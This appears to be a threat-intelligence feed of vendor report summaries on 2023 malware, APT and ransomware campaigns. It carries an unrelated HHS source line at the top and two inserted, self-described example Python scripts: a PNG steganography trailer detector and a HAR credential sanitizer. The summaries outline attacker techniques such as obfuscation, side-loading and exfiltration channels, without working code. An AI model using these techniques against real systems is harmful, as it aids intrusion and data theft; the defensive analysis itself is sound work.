Source: https://www.hhs.gov/sites/default/files/8base-ransomware-analyst-note.pdf
2023-11-02
Iran_Group_MuddyWater_Targeting_Israel
MEDIUM
Intel Source:
Deep Instinct
Intel Name:
Iran_Group_MuddyWater_Targeting_Israel
Date of Scan:
2023-11-02
Impact:
MEDIUM
Summary:
A fresh spear-phishing campaign targeting two Israeli businesses has been connected to the Iranian nation-state actor MuddyWater. The campaign's ultimate goal is to deliver Advanced Monitoring Agent, a genuine remote administration tool from N-able.
Source: https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps
2023-11-02
Ransomware_Group_HelloKitty_Exploiting_Apache_ActiveMQ_Vulnerability
LOW
Intel Source:
Rapid7
Intel Name:
Ransomware_Group_HelloKitty_Exploiting_Apache_ActiveMQ_Vulnerability
Date of Scan:
2023-11-02
Impact:
LOW
Summary:
Rapid7 researchers have issued a warning regarding the potential for remote code execution in the event that a recently discovered severe security hole in the Apache ActiveMQ open-source message broker service is exploited.
Source: https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
2023-11-02
The_upgraded_variant_of_Kazuar
LOW
Intel Source:
PaloAlto
Intel Name:
The_upgraded_variant_of_Kazuar
Date of Scan:
2023-11-02
Impact:
LOW
Summary:
Kazuar is a .NET backdoor used by Pensive Ursa as a second stage payload. It has robust code and string obfuscation techniques, a multithreaded model for enhanced performance, and a range of encryption schemes to protect its code from analysis and to conceal its data. It supports over 40 distinct commands, half of which were previously undocumented, and has anti-analysis functionalities, extensive system profiling capabilities, and is specifically targeted at cloud applications. Cortex XDR can detect and prevent the execution of Kazuar.
Source: https://unit42.paloaltonetworks.com/pensive-ursa-uses-upgraded-kazuar-backdoor/
2023-11-02
An_Infostealer_actively_being_distributed
MEDIUM
Intel Source:
Ciberdefensa, ASEC
Intel Name:
An_Infostealer_actively_being_distributed
Date of Scan:
2023-11-02
Impact:
MEDIUM
Summary:
This article warns against the malicious behavior of the LummaC2 infostealer, which is distributed by executing legitimate EXE files with malicious DLLs disguised as cracks and keygens. It provides IOC information, C2 information, and encourages readers to subscribe to AhnLab's TIP platform for further analysis.
Source: https://ciberdefensa.cat/archivos/28455 https://asec.ahnlab.com/en/58319/
2023-11-02
Malicious_HWP_documents_with_embedded_OLE_object
LOW
Intel Source:
ASEC
Intel Name:
Malicious_HWP_documents_with_embedded_OLE_object
Date of Scan:
2023-11-02
Impact:
LOW
Summary:
ASEC found malicious HWP documents embedded with OLE objects targeting individuals in specific sectors. The documents prompt users to click the OLE object, which contains a malicious URL. The second type of HWP document has a malicious script file embedded, which executes an additional script code from GitHub. When executed, files zz.bat and oz.txt are created, which contain PowerShell commands to download and execute data from GitHub.
Source: https://asec.ahnlab.com/en/58335/
2023-11-01
Knight_Ransomware_activity
MEDIUM
Intel Source:
Fortinet
Intel Name:
Knight_Ransomware_activity
Date of Scan:
2023-11-01
Impact:
MEDIUM
Summary:
This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet's protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet's Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-knight
2023-11-01
NuGet_expose_to_malicious_activities_by_threat_actors
MEDIUM
Intel Source:
Reversing Labs
Intel Name:
NuGet_expose_to_malicious_activities_by_threat_actors
Date of Scan:
2023-11-01
Impact:
MEDIUM
Summary:
Source: https://www.reversinglabs.com/blog/iamreboot-malicious-nuget-packages-exploit-msbuild-loophole
2023-11-01
An_ongoing_Iranian_espionage_campaign_by_Scarred_Manticore
LOW
Intel Source:
Checkpoint
Intel Name:
An_ongoing_Iranian_espionage_campaign_by_Scarred_Manticore
Date of Scan:
2023-11-01
Impact:
LOW
Summary:
Scarred Manticore is an Iranian nation-state threat actor that deploys LIONTAIL, a backdoor, and other custom components to target government, telecommunications, military, and financial sectors in the Middle East. LIONTAIL utilizes the Windows HTTP Stack to register URL prefixes and receive requests, and uses XOR-based encryption to protect data. It also uses the WINTAPIX driver to inject shellcode into processes and execute .NET assemblies from memory.
Source: https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/
2023-11-01
The_discovery_of_a_kill_switch_that_took_down_a_botnet
LOW
Intel Source:
Welivesecurity
Intel Name:
The_discovery_of_a_kill_switch_that_took_down_a_botnet
Date of Scan:
2023-11-01
Impact:
LOW
Summary:
Source: https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
2023-11-01
The_estimate_of_cyber_attacks_cost
LOW
Intel Source:
Talos
Intel Name:
The_estimate_of_cyber_attacks_cost
Date of Scan:
2023-11-01
Impact:
LOW
Summary:
This article discusses the potential for estimates of cyber attack costs to create fear, uncertainty, and doubt (FUD) in the cybersecurity space. Instead of focusing on these estimates, the author suggests focusing on ways to get easy cybersecurity wins. It also provides an overview of the YoroTrooper threat actor, security headlines, upcoming events, and a list of the most prevalent malware files from Talos telemetry.
Source: https://blog.talosintelligence.com/threat-source-newsletter-oct-26-2023/
2023-11-01
The_DPRK_infects_blockchain_engineers_with_new_macOS_malware
LOW
Intel Source:
Elastic
Intel Name:
The_DPRK_infects_blockchain_engineers_with_new_macOS_malware
Date of Scan:
2023-11-01
Impact:
LOW
Summary:
The article describes the malicious code KANDYKORN used by the Lazarus Group to access and exfiltrate data from victims' computers. It utilizes reflective loading and encrypted RC4 protocol to communicate with the C2 server. It also provides EQL queries, YARA rules, and observables related to the SUGARLOADER, HLOADER, and KANDYKORN payloads.
Source: https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
2023-11-01
Monitoring_Malicious_Activities_Using_Revealed_IAM_Keys
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Monitoring_Malicious_Activities_Using_Revealed_IAM_Keys
Date of Scan:
2023-11-01
Impact:
MEDIUM
Summary:
In an attempt to aid cryptojacking activities, a new ongoing campaign known as EleKtra-Leak is focusing on exposed identity and access management (IAM) credentials from Amazon Web Services (AWS) inside open GitHub projects.
Source: https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/#post-130743-_zb3397lw03tn
2023-10-31
IcedID_Forked_Loader_Delivered_by_TA571
LOW
Intel Source:
Proofpoint
Intel Name:
IcedID_Forked_Loader_Delivered_by_TA571
Date of Scan:
2023-10-31
Impact:
LOW
Summary:
Researchers at Proofpoint have discovered that on October 11 and 18, 2023, TA571 delivered the Forked variant of IcedID in two campaigns. Each of the two campaigns sent more than 6,000 messages, reaching more than 1,200 customers worldwide across numerous industries. The campaigns' emails claimed to be replies to existing conversations, a technique known as thread hijacking. The emails contained 404 TDS URLs that led to the download of a password-protected zip file, with the password provided in the email. Before serving the zip archive, the attack chain ran a number of checks to make sure the recipient was a legitimate target.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader
2023-10-31
BiBi_Linux_a_new_wiper
MEDIUM
Intel Source:
Security Joes
Intel Name:
BiBi_Linux_a_new_wiper
Date of Scan:
2023-10-31
Impact:
MEDIUM
Summary:
Security Joes analysts conducted a forensic investigation and found what appears to be a new Linux wiper malware, which they track as BiBi-Linux Wiper. This malware is an x64 ELF executable lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions.
Source: https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group
2023-10-30
Invasions_by_Netsupport_Result_in_Domain_Compromises
LOW
Intel Source:
The DFIR Report
Intel Name:
Invasions_by_Netsupport_Result_in_Domain_Compromises
Date of Scan:
2023-10-30
Impact:
LOW
Summary:
Researchers from the DFIR Report examined a January 2023 case in which a network was compromised using a NetSupport RAT. After that, a full domain breach was achieved through the usage of the RAT for persistence and command and control.
Source: https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
2023-10-30
Numerous_Critical_Networks_Breached_by_Russian_State_Hackers
MEDIUM
Intel Source:
CERT SSI
Intel Name:
Numerous_Critical_Networks_Breached_by_Russian_State_Hackers
Date of Scan:
2023-10-30
Impact:
MEDIUM
Summary:
Since the second part of 2021, the Russian hacking group APT28 (also known as "Strontium" or "Fancy Bear") has been focusing on French government agencies, corporations, academic institutions, research centers, and think tanks. The attack group was recently connected to the exploitation of two vulnerabilities: CVE-2023-23397, a zero-day privilege elevation weakness in Microsoft Outlook, and CVE-2023-38831, a remote code execution vulnerability in WinRAR. The threat group is thought to be a part of Russia's military intelligence service GRU.
Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf
2023-10-30
Dynamic_Search_Ads_Delivering_Malware
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Dynamic_Search_Ads_Delivering_Malware
Date of Scan:
2023-10-30
Impact:
LOW
Summary:
Researchers at Malwarebytes examined another case in which, strange as it may seem, the malvertising was entirely unintentional: it resulted from two separate elements coming together, Google Dynamic Search Ads and a hijacked website.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza
2023-10-30
Fake_Google_chrome_update_malware
LOW
+
Intel Source:
Sucuri
Intel Name:
Fake_Google_chrome_update_malware
Date of Scan:
2023-10-30
Impact:
LOW
Summary:
Fake Google Chrome update malware associated with SocGholish tricks users into downloading a RAT. Attackers inject malicious JavaScript into compromised websites that mimics the official Chrome download page; when the "Update" button is clicked, the script triggers a malicious download. The payloads belong to the Zgrat and Redline Stealer families. Website owners should patch plugins and themes, secure and harden WordPress, and keep backups to protect against this malware.
Source: https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html
2023-10-30
Hackers_Infect_Windows_Systems_with_MSIX_App_Packages
MEDIUM
+
Intel Source:
Elastic
Intel Name:
Hackers_Infect_Windows_Systems_with_MSIX_App_Packages
Date of Scan:
2023-10-30
Impact:
MEDIUM
Summary:
A new campaign has been observed distributing a novel malware loader known as GHOSTPULSE by means of fake MSIX Windows app package files for widely used programs such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.
Source: https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks
2023-10-30
Remcos_RAT_Distribution_Clad_in_Payslip
LOW
+
Intel Source:
ASEC
Intel Name:
Remcos_RAT_Distribution_Clad_in_Payslip
Date of Scan:
2023-10-30
Impact:
LOW
Summary:
Researchers from ASEC have identified cases in which the Remcos RAT is distributed via emails disguised as payslips.
Source: https://asec.ahnlab.com/en/58195/
2023-10-30
A_Look_Back_at_AvosLocker
LOW
+
Intel Source:
Zscaler
Intel Name:
A_Look_Back_at_AvosLocker
Date of Scan:
2023-10-30
Impact:
LOW
Summary:
According to Zscaler's analysis, AvosLocker was a ransomware group that operated until May 2023 and carried out double-extortion attacks. The group used several ransomware variants to attack multiple operating systems.
Source: https://www.zscaler.com/blogs/security-research/retrospective-avoslocker
2023-10-27
The_Higaisa_APT_group_targeting_Chinese_users
LOW
+
Intel Source:
Cyble
Intel Name:
The_Higaisa_APT_group_targeting_Chinese_users
Date of Scan:
2023-10-27
Impact:
LOW
Summary:
Cyble researchers have observed a new APT campaign that tricks victims through phishing and by imitating well-known applications. In this instance, a phishing website impersonating OpenVPN software, built for Chinese users, served as the host for delivering the malicious payload.
Source: https://cyble.com/blog/higaisa-apt-resurfaces-via-phishing-website-targeting-chinese-users/
2023-10-27
Introducing_Lazarus_New_Campaign
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Introducing_Lazarus_New_Campaign
Date of Scan:
2023-10-27
Impact:
MEDIUM
Summary:
Securelist researchers found that the vendor of the compromised software had been breached by Lazarus repeatedly. The repeated breaches point to a persistent and determined threat actor that kept targeting other software developers while exploiting weaknesses in the vendor's software, most likely to obtain valuable source code or to tamper with the software supply chain.
Source: https://securelist.com/unveiling-lazarus-new-campaign/110888/
2023-10-27
StripedFly_exploit
LOW
+
Intel Source:
Securelist
Intel Name:
StripedFly_exploit
Date of Scan:
2023-10-27
Impact:
LOW
Summary:
Securelist detailed StripedFly, a threat that had long been dismissed as just another cryptocurrency miner but is in fact a modular framework supporting both Linux and Windows. It ships with a built-in Tor network tunnel for communication with its command servers, plus update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives.
Source: https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/
2023-10-26
LinkedIn_Based_Identity_Theft_Campaign_Leveraging_DuckTail_Malware
LOW
+
Intel Source:
Cluster25
Intel Name:
LinkedIn_Based_Identity_Theft_Campaign_Leveraging_DuckTail_Malware
Date of Scan:
2023-10-26
Impact:
LOW
Summary:
A recent campaign exploits compromised LinkedIn accounts to target Italian technology professionals, primarily in sales and finance roles. Attackers use LinkedIn messages to distribute fraudulent job offers with embedded malicious links that lead to phishing sites and deliver DuckTail malware. This malware steals browser data, including cookies and credentials, which are exfiltrated through a Telegram bot. The malware also facilitates Facebook Business hijacking.
Source: https://blog.cluster25.duskrise.com/2023/10/25/the-duck-is-hiring
2023-10-26
Iranian_Group_Tortoiseshell_Using_IMAPLoader_Malware
MEDIUM
+
Intel Source:
PWC
Intel Name:
Iranian_Group_Tortoiseshell_Using_IMAPLoader_Malware
Date of Scan:
2023-10-26
Impact:
MEDIUM
Summary:
A new wave of watering hole attacks designed to deliver malware called IMAPLoader has been linked to the Iranian threat actor Tortoiseshell. "IMAPLoader is a .NET malware that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads," PwC's report states.
Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
2023-10-26
Menorah_malware_details
LOW
+
Intel Source:
Netscope
Intel Name:
Menorah_malware_details
Date of Scan:
2023-10-26
Impact:
LOW
Summary:
This month, Netskope analysts investigated a suspicious Word document carrying malware dubbed "Menorah." The malware is attributed to the threat group APT34 and was distributed via spear-phishing. The malicious Office file uses obfuscated VBA code to evade detection.
Source: https://www.netskope.com/blog/netskope-threat-coverage-menorah
2023-10-26
The_Winter_Vivern_cyberespionage_operations
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
The_Winter_Vivern_cyberespionage_operations
Date of Scan:
2023-10-26
Impact:
LOW
Summary:
ESET researchers have been monitoring Winter Vivern for a long time and recently observed that the group began exploiting a zero-day XSS vulnerability in the Roundcube Webmail server at the beginning of October 2023. ESET telemetry shows that the campaign targets Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.
Source: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/
2023-10-26
The_Mystic_Stealer_Returns
LOW
+
Intel Source:
Zscaler
Intel Name:
The_Mystic_Stealer_Returns
Date of Scan:
2023-10-26
Impact:
LOW
Summary:
The Mystic Stealer downloader and information stealer first appeared in early 2023. The stealer harvests data from a multitude of web browsers and cryptocurrency wallet applications.
Source: https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited#indicators-of-compromise--iocs-
2023-10-25
Active_WatchDog_mining_organization_samples_analyses
MEDIUM
+
Intel Source:
Antiy CERT
Intel Name:
Active_WatchDog_mining_organization_samples_analyses
Date of Scan:
2023-10-25
Impact:
MEDIUM
Summary:
This month, Antiy CERT obtained active samples from the WatchDog cryptomining group. The group mainly attacks exposed Docker Engine API endpoints and Redis servers and can quickly spread from one infected machine to the entire network. WatchDog has been active since January 2019 and remains active today.
Source: https://www.antiy.cn/research/notice&report/research_report/WatchDogTrojans_Analysis.html
2023-10-25
North_Korean_IT_Scammers_Defrauding_Global_Businesses
MEDIUM
+
Intel Source:
The Hackers News
Intel Name:
North_Korean_IT_Scammers_Defrauding_Global_Businesses
Date of Scan:
2023-10-25
Impact:
MEDIUM
Summary:
The Republic of Korea and the U.S. announced the seizure of 17 website domains used by North Korean information technology (IT) workers as part of an illegal scheme to defraud businesses around the world, evade sanctions, and fund the country's ballistic missile program.
Source: https://thehackernews.com/2023/10/us-doj-cracks-down-on-north-korean-it_20.html
2023-10-25
Malvertising_campaigns_for_WhatsApp_and_Telegram
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Malvertising_campaigns_for_WhatsApp_and_Telegram
Date of Scan:
2023-10-25
Impact:
LOW
Summary:
Malwarebytes investigated an increase in malicious web pages for the WhatsApp messaging tool, driven by malicious Google ads. The suspicious sites mimicked the web version of WhatsApp to trick victims into scanning a QR code to link a new device. The researchers also discovered another campaign using an ad for the Telegram messaging tool to lure victims into downloading a malicious version of the program. Both attacks were aimed at residents of Hong Kong.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/hong-kong-residents-targeted-in-malvertising-campaigns-for-whatsapp-telegram
2023-10-25
Kazakhstan_associated_YoroTrooper_operators
LOW
+
Intel Source:
Talos
Intel Name:
Kazakhstan_associated_YoroTrooper_operators
Date of Scan:
2023-10-25
Impact:
LOW
Summary:
Talos assesses that the YoroTrooper operators are based in Kazakhstan, based on their language use and their use of Kazakhstani currency, and on the fact that their targeting inside Kazakhstan was limited to the government's Anti-Corruption Agency.
Source: https://blog.talosintelligence.com/attributing-yorotrooper/
2023-10-25
Attacks_on_Russian_Federation_Government_And_Industrial_Sectors
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Attacks_on_Russian_Federation_Government_And_Industrial_Sectors
Date of Scan:
2023-10-25
Impact:
MEDIUM
Summary:
Researchers found several malicious programs whose goal is data theft. Because Kaspersky Threat Intelligence reports that similar programs have been discovered in a number of other government and industrial entities in the Russian Federation, they assess that the attackers' primary objective is to steal data from organizations in these sectors.
Source: https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/
2023-10-24
New_Lumar_stealer_and_Rhysida_ransomware
MEDIUM
+
Intel Source:
Securelist
Intel Name:
New_Lumar_stealer_and_Rhysida_ransomware
Date of Scan:
2023-10-24
Impact:
MEDIUM
Summary:
Securelist analyzed the details on malware that has been active this year: the GoPIX stealer that attacks the PIX payment system, which is popular in Brazil; the Lumar multipurpose stealer advertised on the dark web; and the Rhysida ransomware supporting old Windows versions.
Source: https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/
2023-10-24
Deep_analysis_of_Cactus_ransomware
LOW
+
Intel Source:
Securityscorecard
Intel Name:
Deep_analysis_of_Cactus_ransomware
Date of Scan:
2023-10-24
Impact:
LOW
Summary:
Security ScoreCard researchers shared their detailed analysis about Cactus Ransomware which was first discovered in March 2023. The malware creates a mutex called “b4kr-xr7h-qcps-omu3cAcTuS” to ensure that only one copy is running at a time. Persistence is achieved by creating a scheduled task named “Updates Check Task”. The ransomware requires an AES key to decrypt the encrypted public RSA key stored in the binary.
Source: https://securityscorecard.com/research/deep-dive-into-cactus-ransomware/
2023-10-24
Facebook_malicious_Ads
LOW
+
Intel Source:
Gdatasoftware
Intel Name:
Facebook_malicious_Ads
Date of Scan:
2023-10-24
Impact:
LOW
Summary:
Threat actors hijack Facebook business accounts and run their own advertising campaigns in the victim's name and at the victim's expense. G DATA shared an analysis and a closer look at one such case.
Source: https://www.gdatasoftware.com/blog/2023/10/37814-meta-hijacked-malicious-ads
2023-10-24
The_use_of_Steganography_in_recent_malware_attacks
LOW
+
Intel Source:
Any Run
Intel Name:
The_use_of_Steganography_in_recent_malware_attacks
Date of Scan:
2023-10-24
Impact:
LOW
Summary:
Any.Run analysts recently spotted a surge in the use of steganography in cyber attacks and share the details in this blog post. Steganography hides data within another file or medium, effectively making it invisible.
Source: https://any.run/cybersecurity-blog/steganography-in-malware-attacks/
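One concrete form of the technique above, as an added example that is not from the Any.Run post: a loader appends its payload after the PNG IEND chunk, so the file still renders as a valid image while carrying a blob no image viewer will ever read. The checker below walks the PNG chunk list (verifying each chunk CRC on the way, since a modified chunk body is another carrier pattern), returns whatever follows IEND, and labels the trailer by its magic bytes. The carrier image, the magic table and the "hidden" bytes are all constructed here; the stego variant (appended data) is an assumption about how the loader works, not a claim about a specific sample.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Magic bytes commonly found at the start of appended payloads (assumed list, not from the post).
KNOWN_MAGIC = {
    b"MZ": "pe",
    b"PK\x03\x04": "zip",
    b"\x7fELF": "elf",
    b"#!": "script",
}


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk.

    Raises ValueError for non-PNG input, a truncated chunk, or a chunk whose CRC no
    longer matches its body (a sign the image was edited after it was written).
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 12 + length          # 4 length + 4 type + data + 4 CRC
        if chunk_end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[pos + 4:pos + 8 + length]  # CRC covers type + data
        crc = struct.unpack(">I", data[pos + 8 + length:chunk_end])[0]
        if zlib.crc32(body) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        pos = chunk_end
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk found")


def trailing_payload(data: bytes) -> bytes:
    """Return the bytes that follow IEND; a well-formed image yields b''."""
    return data[png_end_offset(data):]


def classify_trailer(trailer: bytes) -> str:
    """Label the hidden blob by magic: 'none' if empty, 'unknown' if no magic matches."""
    if not trailer:
        return "none"
    for magic, label in KNOWN_MAGIC.items():
        if trailer.startswith(magic):
            return label
    return "unknown"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


def minimal_png() -> bytes:
    """Build a valid 1x1 RGB PNG in memory (constructed carrier, no external file needed)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, bit depth, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter byte + one red pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed carrier with a fake PE header glued on after IEND (these bytes are not a real binary).
STEGO_SAMPLE = minimal_png() + b"MZ" + b"\x90" * 30 + b"CONSTRUCTED-HIDDEN-PAYLOAD"


if __name__ == "__main__":
    for name, blob in (("clean", minimal_png()), ("stego", STEGO_SAMPLE)):
        trailer = trailing_payload(blob)
        print(f"{name}: {len(trailer)} trailing bytes, type={classify_trailer(trailer)}")
```

A trailer is only one indicator: loaders that hide data inside pixel values or inside ancillary chunks pass this check unchanged, so pair it with size outliers (an icon that is 2 MB) and with the process that fetched the image. Treat a CRC failure as a finding too, not merely an error.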
2023-10-24
Deworming_the_XWorm_malware
LOW
+
Intel Source:
Cert.Pl
Intel Name:
Deworming_the_XWorm_malware
Date of Scan:
2023-10-24
Impact:
LOW
Summary:
CERT Polska shared a post with a detailed analysis and walk-through of the reverse-engineering process for a malware family called XWorm. XWorm is a multi-purpose malware family, commonly used as a RAT.
Source: https://cert.pl/en/posts/2023/10/deworming-the-xworm/
2023-10-23
Quasar_RAT_Using_Side_Loading_DLL_Methods
LOW
+
Intel Source:
Uptycs
Intel Name:
Quasar_RAT_Using_Side_Loading_DLL_Methods
Date of Scan:
2023-10-23
Impact:
LOW
Summary:
To accomplish its goals, the Quasar RAT uses DLL side-loading, abusing trusted Microsoft files such as "calc.exe" and "ctfmon.exe." The technique takes advantage of the built-in trust these files enjoy in the Windows environment.
Source: https://www.uptycs.com/blog/quasar-rat
2023-10-23
Lumma_Stealer_multiple_campaigns
MEDIUM
+
Intel Source:
Intrinsec
Intel Name:
Lumma_Stealer_multiple_campaigns
Date of Scan:
2023-10-23
Impact:
MEDIUM
Summary:
Intrinsec, a French cybersecurity firm, has published a report on Lumma Stealer, a malware-as-a-service sold through Telegram and Russian-speaking forums.
Source: https://www.intrinsec.com/wp-content/uploads/2023/10/TLP-CLEAR-Lumma-Stealer-EN-Information-report.pdf
2023-10-23
Customer_Data_Exposed_by_Okta_Support_System_Breach
LOW
+
Intel Source:
Okta
Intel Name:
Customer_Data_Exposed_by_Okta_Support_System_Breach
Date of Scan:
2023-10-23
Impact:
LOW
Summary:
The identity services company Okta has revealed a new security incident in which unknown threat actors gained access to its support case management system using stolen credentials. The Okta support case management system is distinct from the production Okta service, which remained fully operational and unaffected. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases.
Source: https://sec.okta.com/harfiles
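The files support staff ask for in cases like this are typically browser HAR captures (the source URL itself says "harfiles"), and a HAR records every request header and cookie, including live session cookies and API tokens. The sanitizer below is an added example, not Okta's tooling or guidance: it redacts credential-bearing headers, all cookie values, and request bodies before the file leaves the organisation, and `has_secrets` acts as a gate so a half-sanitised file is never written. The header list, the sample capture, and every hostname, cookie and token value in it are constructed for the example.

```python
import copy
import json

# Header names whose values carry session or API credentials (assumed list; compared case-insensitively).
SENSITIVE_HEADERS = {"authorization", "proxy-authorization", "cookie", "set-cookie", "x-okta-xsrftoken"}
REDACTED = "[REDACTED]"


def _scrub_message(msg: dict) -> None:
    """Redact credential-bearing headers and every cookie value in one request or response."""
    for header in msg.get("headers", []):
        if header.get("name", "").lower() in SENSITIVE_HEADERS:
            header["value"] = REDACTED
    for cookie in msg.get("cookies", []):
        if "value" in cookie:
            cookie["value"] = REDACTED


def sanitize_har(har: dict) -> dict:
    """Return a deep copy of a parsed HAR with secrets removed; the input is left untouched."""
    clean = copy.deepcopy(har)
    for entry in clean.get("log", {}).get("entries", []):
        _scrub_message(entry.get("request", {}))
        _scrub_message(entry.get("response", {}))
        # Request bodies (login forms, token exchanges) are dropped wholesale: the timing
        # and status data support staff need survive, the secrets do not.
        post = entry.get("request", {}).get("postData")
        if isinstance(post, dict) and "text" in post:
            post["text"] = REDACTED
    return clean


def has_secrets(har: dict) -> bool:
    """Pre-upload gate: True if any sensitive header or cookie value is still present."""
    for entry in har.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            msg = entry.get(side, {})
            for header in msg.get("headers", []):
                if header.get("name", "").lower() in SENSITIVE_HEADERS and header.get("value") != REDACTED:
                    return True
            for cookie in msg.get("cookies", []):
                if cookie.get("value", REDACTED) != REDACTED:
                    return True
    return False


def sanitize_har_file(src_path: str, dst_path: str) -> None:
    """Read a HAR from disk and write the sanitized copy; refuse to write if anything leaked through."""
    with open(src_path, "r", encoding="utf-8") as fh:
        clean = sanitize_har(json.load(fh))
    if has_secrets(clean):
        raise RuntimeError("sanitization incomplete; not writing %s" % dst_path)
    with open(dst_path, "w", encoding="utf-8") as fh:
        json.dump(clean, fh, indent=2)


# Constructed sample capture (hostname, cookie and token values are invented, not from any real tenant).
SAMPLE_HAR = {
    "log": {
        "version": "1.2",
        "entries": [{
            "request": {
                "method": "POST",
                "url": "https://example.okta.com/api/v1/authn",
                "headers": [
                    {"name": "Host", "value": "example.okta.com"},
                    {"name": "Cookie", "value": "sid=102AbCdEf; DT=xyz"},
                    {"name": "Authorization", "value": "SSWS 00abc-example-token"},
                ],
                "cookies": [{"name": "sid", "value": "102AbCdEf"}],
                "postData": {"mimeType": "application/json", "text": "{\"password\": \"hunter2\"}"},
            },
            "response": {
                "status": 200,
                "headers": [
                    {"name": "Content-Type", "value": "application/json"},
                    {"name": "Set-Cookie", "value": "sid=102AbCdEf; Secure; HttpOnly"},
                ],
                "cookies": [{"name": "sid", "value": "102AbCdEf"}],
            },
        }],
    }
}


if __name__ == "__main__":
    print("before:", has_secrets(SAMPLE_HAR), "after:", has_secrets(sanitize_har(SAMPLE_HAR)))
```

Redaction only limits the blast radius of a future support-system breach; the session tokens already present in any HAR uploaded before this incident should be treated as exposed and the sessions revoked, which is the action the Okta notice asks affected customers to take.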
2023-10-23
A_Python_Based_Info_stealer_Akira
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_Python_Based_Info_stealer_Akira
Date of Scan:
2023-10-23
Impact:
LOW
Summary:
Cyfirma analysts provided a comprehensive investigation report on the Python-based Akira information stealer, detailing its functionality and capabilities.
Source: https://www.cyfirma.com/outofband/akira-stealer-an-undetected-python-based-info-stealer/
2023-10-21
Traditional_and_modern_threat_hunting_methodologies
LOW
+
Intel Source:
SentinelOne
Intel Name:
Traditional_and_modern_threat_hunting_methodologies
Date of Scan:
2023-10-21
Impact:
LOW
Summary:
This article discusses traditional and modern threat hunting methodologies, emphasizing the need for experienced professionals and effective tooling. It provides examples of successful hunts, such as the SolarWinds Serv-U vulnerability and the Akira ransomware campaign, and outlines the use of advanced tools, AI/machine learning algorithms, and threat intelligence integration.
Source: https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/
2023-10-21
The_analyzes_of_malware_that_abuses_Discord_infrastructure
LOW
+
Intel Source:
Trellix
Intel Name:
The_analyzes_of_malware_that_abuses_Discord_infrastructure
Date of Scan:
2023-10-21
Impact:
LOW
Summary:
Malicious actors are using Discord's Content Delivery Network (CDN) and webhooks to download additional files and exfiltrate information. A sample targeting Ukrainian critical infrastructures was recently discovered, indicating that APT groups may be using Discord. Technical analysis of the sample was provided, along with detection and IoCs. Loaders written in .NET are the most popular malware families using Discord's CDN, and function-level retro-hunting was used to identify them.
Source: https://www.trellix.com/en-au/about/newsroom/stories/research/discord-i-want-to-play-a-game/
